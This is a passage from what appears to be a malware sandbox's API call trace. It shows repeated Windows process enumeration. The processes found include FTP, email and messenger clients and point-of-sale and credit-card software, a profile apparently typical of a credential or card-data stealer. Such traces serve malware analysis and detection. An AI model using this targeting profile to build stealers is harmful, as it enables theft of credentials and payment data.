lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0273.674] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0273.676] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0273.679] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0273.681] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0273.749] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0273.751] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0273.753] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0273.755] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0273.756] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0273.758] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0273.760] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0273.766] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0273.767] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0273.769] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0273.771] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0273.772] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0273.774] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0273.776] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0273.780] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0273.782] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0273.783] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0273.785] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x858, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0273.786] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0273.788] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0273.789] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0273.791] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0273.941] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0273.942] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0273.944] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0273.946] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0273.947] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0273.952] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0273.953] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0273.955] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0273.956] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x108c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="discussion.exe")) returned 1 [0273.958] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="styledesignbusiness.exe")) returned 1 [0273.959] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="new_door.exe")) returned 1 [0273.961] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bed fight.exe")) returned 1 [0273.962] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="federal hotel.exe")) returned 1 [0273.967] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0273.968] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0273.969] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0273.971] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0273.973] CloseHandle (hObject=0x1018) returned 1 [0273.973] Sleep (dwMilliseconds=0x64) [0274.128] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d14 [0274.141] Process32First (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0274.143] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x73, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0274.144] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0274.146] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0274.147] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0274.148] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0274.150] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0274.151] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0274.155] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0274.157] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0274.158] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0274.160] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0274.161] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x46, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0274.162] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0274.164] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0274.166] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0274.188] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0274.189] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0274.191] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0274.192] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0274.194] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0274.196] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0274.201] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0274.204] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0274.206] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0274.208] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0274.209] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0274.210] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0274.212] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xba8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0274.213] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0274.234] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0274.236] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0274.238] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x670, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0274.240] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x428, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="degree_sing_pretty.exe")) returned 1 [0274.242] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="work-heavy.exe")) returned 1 [0274.244] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0274.283] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="real-new.exe")) returned 1 [0274.285] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="letter.exe")) returned 1 [0274.286] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="lightwhere.exe")) returned 1 [0274.288] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, 